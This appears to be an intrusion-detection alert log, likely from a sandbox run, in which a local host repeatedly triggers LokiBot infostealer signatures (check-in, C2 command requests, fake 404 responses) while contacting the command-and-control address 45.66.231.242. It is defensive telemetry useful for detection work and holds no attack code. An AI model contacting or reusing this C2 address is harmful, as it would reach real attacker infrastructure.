2024-10-01T10:55:24.552098+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:24.556972+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49756	TCP
2024-10-01T10:55:24.716379+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:24.716379+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:24.716379+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:25.375102+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:25.375102+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:25.379994+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49757	TCP
2024-10-01T10:55:25.534367+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:25.534367+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:25.534367+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:26.195469+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:26.195469+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:26.200291+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49758	TCP
2024-10-01T10:55:26.361457+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:26.361457+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:26.361457+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:27.085668+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:27.085668+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:27.090660+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49759	TCP
2024-10-01T10:55:27.260785+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:27.260785+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:27.260785+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:27.951507+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:27.951507+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:27.956334+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49760	TCP
2024-10-01T10:55:28.111446+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:28.111446+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:28.111446+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:28.839624+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:28.839624+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:28.844483+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49761	TCP
2024-10-01T10:55:28.997001+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:28.997001+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:28.997001+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:29.661872+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:29.661872+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:29.666645+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49762	TCP
2024-10-01T10:55:29.807741+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:29.807741+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:29.807741+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:30.557844+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:30.557844+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:30.563306+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49763	TCP
2024-10-01T10:55:30.730772+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:30.730772+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:30.730772+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:31.394167+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:31.394167+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:31.399345+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49764	TCP
2024-10-01T10:55:31.541452+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:31.541452+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:31.541452+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:32.194135+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:32.194135+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:32.198987+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49765	TCP
2024-10-01T10:55:32.344919+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:32.344919+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:32.344919+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:33.025064+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:33.025064+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:33.049597+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49766	TCP
2024-10-01T10:55:33.286078+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:33.286078+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:33.286078+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:33.949352+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:33.949352+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:33.954180+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49767	TCP
2024-10-01T10:55:34.118881+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:34.118881+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:34.118881+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:34.773757+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:34.773757+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:34.781785+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49768	TCP
2024-10-01T10:55:34.933166+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:34.933166+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:34.933166+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:35.685085+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:35.685085+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:35.689906+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49769	TCP
2024-10-01T10:55:35.839128+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:35.839128+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:35.839128+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:36.536343+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:36.536343+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:36.541214+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49770	TCP
2024-10-01T10:55:36.706651+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:36.706651+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:36.706651+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:37.350895+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:37.350895+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:37.355853+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49771	TCP
2024-10-01T10:55:37.524416+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:37.524416+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:37.524416+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:38.216992+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:38.216992+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:38.221829+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49772	TCP
2024-10-01T10:55:38.374178+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:38.374178+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:38.374178+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:39.220320+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:39.220320+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:39.225109+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49773	TCP
2024-10-01T10:55:39.385441+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:39.385441+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:39.385441+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:40.152556+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:40.152556+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:40.160479+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49774	TCP
2024-10-01T10:55:40.328121+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:40.328121+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:40.328121+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:41.022138+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:41.022138+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:41.026897+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49775	TCP
2024-10-01T10:55:41.381303+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:41.381303+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:41.381303+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:42.240978+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:42.240978+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:42.246152+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49776	TCP
2024-10-01T10:55:42.421721+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:42.421721+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:42.421721+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:43.424782+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:43.424782+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:43.429625+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49777	TCP
2024-10-01T10:55:43.589678+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:43.589678+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:43.589678+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:47.272279+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:47.272279+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:47.277080+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49778	TCP
2024-10-01T10:55:47.464644+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:47.464644+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:47.464644+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:48.112864+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:48.112864+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:48.117744+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49779	TCP
2024-10-01T10:55:48.292929+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:48.292929+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:48.292929+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:48.953210+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:48.953210+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:48.973432+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49780	TCP
2024-10-01T10:55:49.348506+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:49.348506+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:49.348506+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:50.176120+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:50.176120+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:50.181516+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49781	TCP
2024-10-01T10:55:50.343657+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:50.343657+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:50.343657+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:50.990247+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:50.990247+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:50.995191+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49782	TCP
2024-10-01T10:55:51.144817+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:51.144817+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:51.144817+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:51.898024+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:51.898024+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:51.902879+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49783	TCP
2024-10-01T10:55:52.156456+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:52.156456+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:52.156456+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:53.034432+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:53.034432+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:53.039442+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49784	TCP
2024-10-01T10:55:53.192942+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:53.192942+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:53.192942+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:53.833889+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:53.833889+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:53.838641+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49786	TCP
2024-10-01T10:55:53.988611+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:53.988611+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:53.988611+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:54.639139+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:54.639139+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:54.643998+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49787	TCP
2024-10-01T10:55:54.958720+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:54.958720+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:54.958720+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:55.642415+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:55.642415+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:55.647797+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49788	TCP
2024-10-01T10:55:55.793611+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:55.793611+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:55.793611+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:56.438948+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:56.438948+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:56.443702+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49789	TCP
2024-10-01T10:55:56.591640+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:56.591640+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:56.591640+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:57.289043+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:57.289043+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:57.293823+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49790	TCP
2024-10-01T10:55:57.452108+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:57.452108+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:57.452108+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49791	45.66.231.242	80	TCP
